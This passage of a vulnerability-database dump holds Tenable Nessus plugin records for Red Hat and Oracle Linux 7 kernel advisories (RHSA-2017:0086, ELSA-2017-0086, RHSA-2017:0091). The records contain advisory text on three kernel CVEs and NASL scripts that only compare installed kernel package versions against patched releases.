(!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0091\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debug-kvm-debuginfo-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-rt-doc-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-kvm-debuginfo-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-rt-trace-kvm-debuginfo-3.10.0-514.6.1.rt56.429.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-06T09:50:22", "references": ["https://oss.oracle.com/pipermail/el-errata/2017-January/006650.html"], "pluginID": "96588", "description": "From Red Hat Security Advisory 2017:0086 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous bug fixes, some of which you can see below. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/ articles/2857831.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of the SCTP protocol. A remote attacker could trigger an out-of-bounds read with an offset of up to 64kB potentially causing the system to crash.\n(CVE-2016-9555, Moderate)\n\nBug Fix(es) :\n\n* Previously, the performance of Internet Protocol over InfiniBand (IPoIB) was suboptimal due to a conflict of IPoIB with the Generic Receive Offload (GRO) infrastructure. With this update, the data cached by the IPoIB driver has been moved from a control block into the IPoIB hard header, thus avoiding the GRO problem and the corruption of IPoIB address information. As a result, the performance of IPoIB has been improved. (BZ#1390668)\n\n* Previously, when a virtual machine (VM) with PCI-Passthrough interfaces was recreated, a race condition between the eventfd daemon and the virqfd daemon occurred. Consequently, the operating system rebooted. This update fixes the race condition. As a result, the operating system no longer reboots in the described situation.\n(BZ#1391611)\n\n* Previously, a packet loss occurred when the team driver in round-robin mode was sending a large number of packets. This update fixes counting of the packets in the round-robin runner of the team driver, and the packet loss no longer occurs in the described situation. (BZ#1392023)\n\n* Previously, the virtual network devices contained in the deleted namespace could be deleted in any order. If the loopback device was not deleted as the last item, other netns devices, such as vxlan devices, could end up with dangling references to the loopback device.\nConsequently, deleting a network namespace (netns) occasionally ended by a kernel oops. With this update, the underlying source code has been fixed to ensure the correct order when deleting the virtual network devices on netns deletion. As a result, the kernel oops no longer occurs under the described circumstances. (BZ#1392024)\n\n* Previously, a Kabylake system with a Sunrise Point Platform Controller Hub (PCH) with a PCI device ID of 0xA149 showed the following warning messages during the boot :\n\n'Unknown Intel PCH (0xa149) detected.' 'Warning: Intel Kabylake processor with unknown PCH - this hardware has not undergone testing by Red Hat and might not be certified. Please consult https:/ /hardware.redhat.com for certified hardware.'\n\nThe messages were shown because this PCH was not properly recognized.\nWith this update, the problem has been fixed, and the operating system now boots without displaying the warning messages. (BZ#1392033)\n\n* Previously, the operating system occasionally became unresponsive after a long run. This was caused by a race condition between the try_to_wake_up() function and a woken up task in the core scheduler.\nWith this update, the race condition has been fixed, and the operating system no longer locks up in the described scenario. (BZ#1393719)", "edition": 7, "reporter": "Tenable", "published": "2017-01-18T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2017-0086)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-9555", "CVE-2016-6828"], "modified": "2018-09-05T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2017-0086.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96588", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:0086 and \n# Oracle Linux Security Advisory ELSA-2017-0086 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96588);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/09/05 15:02:26\");\n\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-7117\", \"CVE-2016-9555\");\n script_xref(name:\"RHSA\", value:\"2017:0086\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2017-0086)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:0086 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes, some of which you can see below. Space precludes\ndocumenting all of these bug fixes in this advisory. To see the\ncomplete list of bug fixes, users are directed to the related\nKnowledge Article: https://access.redhat.com/ articles/2857831.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernel's socket\nrecvmmsg subsystem. This may allow remote attackers to corrupt memory\nand may allow execution of arbitrary code. This corruption takes place\nduring the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in\ntcp_xmit_retransmit_queue and other tcp_* functions. This condition\ncould allow an attacker to send an incorrect selective acknowledgment\nto existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of the SCTP\nprotocol. A remote attacker could trigger an out-of-bounds read with\nan offset of up to 64kB potentially causing the system to crash.\n(CVE-2016-9555, Moderate)\n\nBug Fix(es) :\n\n* Previously, the performance of Internet Protocol over InfiniBand\n(IPoIB) was suboptimal due to a conflict of IPoIB with the Generic\nReceive Offload (GRO) infrastructure. With this update, the data\ncached by the IPoIB driver has been moved from a control block into\nthe IPoIB hard header, thus avoiding the GRO problem and the\ncorruption of IPoIB address information. As a result, the performance\nof IPoIB has been improved. (BZ#1390668)\n\n* Previously, when a virtual machine (VM) with PCI-Passthrough\ninterfaces was recreated, a race condition between the eventfd daemon\nand the virqfd daemon occurred. Consequently, the operating system\nrebooted. This update fixes the race condition. As a result, the\noperating system no longer reboots in the described situation.\n(BZ#1391611)\n\n* Previously, a packet loss occurred when the team driver in\nround-robin mode was sending a large number of packets. This update\nfixes counting of the packets in the round-robin runner of the team\ndriver, and the packet loss no longer occurs in the described\nsituation. (BZ#1392023)\n\n* Previously, the virtual network devices contained in the deleted\nnamespace could be deleted in any order. If the loopback device was\nnot deleted as the last item, other netns devices, such as vxlan\ndevices, could end up with dangling references to the loopback device.\nConsequently, deleting a network namespace (netns) occasionally ended\nby a kernel oops. With this update, the underlying source code has\nbeen fixed to ensure the correct order when deleting the virtual\nnetwork devices on netns deletion. As a result, the kernel oops no\nlonger occurs under the described circumstances. (BZ#1392024)\n\n* Previously, a Kabylake system with a Sunrise Point Platform\nController Hub (PCH) with a PCI device ID of 0xA149 showed the\nfollowing warning messages during the boot :\n\n'Unknown Intel PCH (0xa149) detected.' 'Warning: Intel Kabylake\nprocessor with unknown PCH - this hardware has not undergone testing\nby Red Hat and might not be certified. Please consult https:/\n/hardware.redhat.com for certified hardware.'\n\nThe messages were shown because this PCH was not properly recognized.\nWith this update, the problem has been fixed, and the operating system\nnow boots without displaying the warning messages. (BZ#1392033)\n\n* Previously, the operating system occasionally became unresponsive\nafter a long run. This was caused by a race condition between the\ntry_to_wake_up() function and a woken up task in the core scheduler.\nWith this update, the race condition has been fixed, and the operating\nsystem no longer locks up in the described scenario. (BZ#1393719)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-January/006650.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-abi-whitelists-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-abi-whitelists-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-debug-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-doc-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-doc-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-headers-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-tools-libs-devel-3.10.0\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.6.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.6.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T16:51:37", "references": ["https://access.redhat.com/articles/2857831", "https://access.redhat.com/security/cve/cve-2016-6828", "https://access.redhat.com/errata/RHSA-2017:0086", "https://access.redhat.com/security/cve/cve-2016-9555", "https://access.redhat.com/security/cve/cve-2016-7117"], "pluginID": "96593", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous bug fixes, some of which you can see below. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/ articles/2857831.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of the SCTP protocol. A remote attacker could trigger an out-of-bounds read with an offset of up to 64kB potentially causing the system to crash.\n(CVE-2016-9555, Moderate)\n\nBug Fix(es) :\n\n* Previously, the performance of Internet Protocol over InfiniBand (IPoIB) was suboptimal due to a conflict of IPoIB with the Generic Receive Offload (GRO) infrastructure. With this update, the data cached by the IPoIB driver has been moved from a control block into the IPoIB hard header, thus avoiding the GRO problem and the corruption of IPoIB address information. As a result, the performance of IPoIB has been improved. (BZ#1390668)\n\n* Previously, when a virtual machine (VM) with PCI-Passthrough interfaces was recreated, a race condition between the eventfd daemon and the virqfd daemon occurred. Consequently, the operating system rebooted. This update fixes the race condition. As a result, the operating system no longer reboots in the described situation.\n(BZ#1391611)\n\n* Previously, a packet loss occurred when the team driver in round-robin mode was sending a large number of packets. This update fixes counting of the packets in the round-robin runner of the team driver, and the packet loss no longer occurs in the described situation. (BZ#1392023)\n\n* Previously, the virtual network devices contained in the deleted namespace could be deleted in any order. If the loopback device was not deleted as the last item, other netns devices, such as vxlan devices, could end up with dangling references to the loopback device.\nConsequently, deleting a network namespace (netns) occasionally ended by a kernel oops. With this update, the underlying source code has been fixed to ensure the correct order when deleting the virtual network devices on netns deletion. As a result, the kernel oops no longer occurs under the described circumstances. (BZ#1392024)\n\n* Previously, a Kabylake system with a Sunrise Point Platform Controller Hub (PCH) with a PCI device ID of 0xA149 showed the following warning messages during the boot :\n\n'Unknown Intel PCH (0xa149) detected.' 'Warning: Intel Kabylake processor with unknown PCH - this hardware has not undergone testing by Red Hat and might not be certified. Please consult https:/ /hardware.redhat.com for certified hardware.'\n\nThe messages were shown because this PCH was not properly recognized.\nWith this update, the problem has been fixed, and the operating system now boots without displaying the warning messages. (BZ#1392033)\n\n* Previously, the operating system occasionally became unresponsive after a long run. This was caused by a race condition between the try_to_wake_up() function and a woken up task in the core scheduler.\nWith this update, the race condition has been fixed, and the operating system no longer locks up in the described scenario. (BZ#1393719)", "edition": 9, "reporter": "Tenable", "published": "2017-01-18T00:00:00", "title": "RHEL 7 : kernel (RHSA-2017:0086)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-9555", "CVE-2016-6828"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2017-0086.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96593", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0086. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96593);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/11/10 11:49:56\");\n\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-7117\", \"CVE-2016-9555\");\n script_xref(name:\"RHSA\", value:\"2017:0086\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2017:0086)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes, some of which you can see below. Space precludes\ndocumenting all of these bug fixes in this advisory. To see the\ncomplete list of bug fixes, users are directed to the related\nKnowledge Article: https://access.redhat.com/ articles/2857831.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernel's socket\nrecvmmsg subsystem. This may allow remote attackers to corrupt memory\nand may allow execution of arbitrary code. This corruption takes place\nduring the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* A use-after-free vulnerability was found in\ntcp_xmit_retransmit_queue and other tcp_* functions. This condition\ncould allow an attacker to send an incorrect selective acknowledgment\nto existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of the SCTP\nprotocol. A remote attacker could trigger an out-of-bounds read with\nan offset of up to 64kB potentially causing the system to crash.\n(CVE-2016-9555, Moderate)\n\nBug Fix(es) :\n\n* Previously, the performance of Internet Protocol over InfiniBand\n(IPoIB) was suboptimal due to a conflict of IPoIB with the Generic\nReceive Offload (GRO) infrastructure. With this update, the data\ncached by the IPoIB driver has been moved from a control block into\nthe IPoIB hard header, thus avoiding the GRO problem and the\ncorruption of IPoIB address information. As a result, the performance\nof IPoIB has been improved. (BZ#1390668)\n\n* Previously, when a virtual machine (VM) with PCI-Passthrough\ninterfaces was recreated, a race condition between the eventfd daemon\nand the virqfd daemon occurred. Consequently, the operating system\nrebooted. This update fixes the race condition. As a result, the\noperating system no longer reboots in the described situation.\n(BZ#1391611)\n\n* Previously, a packet loss occurred when the team driver in\nround-robin mode was sending a large number of packets. This update\nfixes counting of the packets in the round-robin runner of the team\ndriver, and the packet loss no longer occurs in the described\nsituation. (BZ#1392023)\n\n* Previously, the virtual network devices contained in the deleted\nnamespace could be deleted in any order. If the loopback device was\nnot deleted as the last item, other netns devices, such as vxlan\ndevices, could end up with dangling references to the loopback device.\nConsequently, deleting a network namespace (netns) occasionally ended\nby a kernel oops. With this update, the underlying source code has\nbeen fixed to ensure the correct order when deleting the virtual\nnetwork devices on netns deletion. As a result, the kernel oops no\nlonger occurs under the described circumstances. (BZ#1392024)\n\n* Previously, a Kabylake system with a Sunrise Point Platform\nController Hub (PCH) with a PCI device ID of 0xA149 showed the\nfollowing warning messages during the boot :\n\n'Unknown Intel PCH (0xa149) detected.' 'Warning: Intel Kabylake\nprocessor with unknown PCH - this hardware has not undergone testing\nby Red Hat and might not be certified. Please consult https:/\n/hardware.redhat.com for certified hardware.'\n\nThe messages were shown because this PCH was not properly recognized.\nWith this update, the problem has been fixed, and the operating system\nnow boots without displaying the warning messages. (BZ#1392033)\n\n* Previously, the operating system occasionally became unresponsive\nafter a long run. This was caused by a race condition between the\ntry_to_wake_up() function and a woken up task in the core scheduler.\nWith this update, the race condition has been fixed, and the operating\nsystem no longer locks up in the described scenario. (BZ#1393719)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/2857831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7117\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9555\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 